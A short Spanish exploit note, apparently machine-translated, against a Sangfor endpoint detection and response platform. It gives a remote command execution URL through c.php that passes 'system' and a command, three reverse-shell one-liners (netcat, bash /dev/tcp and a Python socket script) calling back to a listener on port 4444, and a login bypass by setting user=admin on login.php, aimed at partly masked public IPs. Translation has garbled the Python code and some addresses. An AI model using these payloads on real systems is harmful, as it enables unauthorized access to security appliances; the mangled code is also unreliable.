Vulnerabilidad RCE remota de la plataforma de respuesta y detección de terminales Sangfor, cualquier usuario puede iniciar sesión
https://111.231.xx.xx/tool/log/c.php?strip_slashes=system&host=id
Intenta jugar un shell
nc 10.20 .3.129 4444 -e /bin/bash nc no pudo intentar recuperar el shell
bash -i >& /dev/tcp/10.20.2.185/4444 0>&1 bash no pudo intentar recuperar el shell
sanqiushu@sanqiushu-VirtualBox:~$ python -c "importar sistema operativo,socket,subproceso;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.20. 2.185',4444) );os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subproceso. call(['/ bin/bash','-i']);" Python es increíble
https://114.119.x.xxx/ui/login.php?user=admin
Configure directamente usuario=xxx para iniciar sesión en el sistema como xxx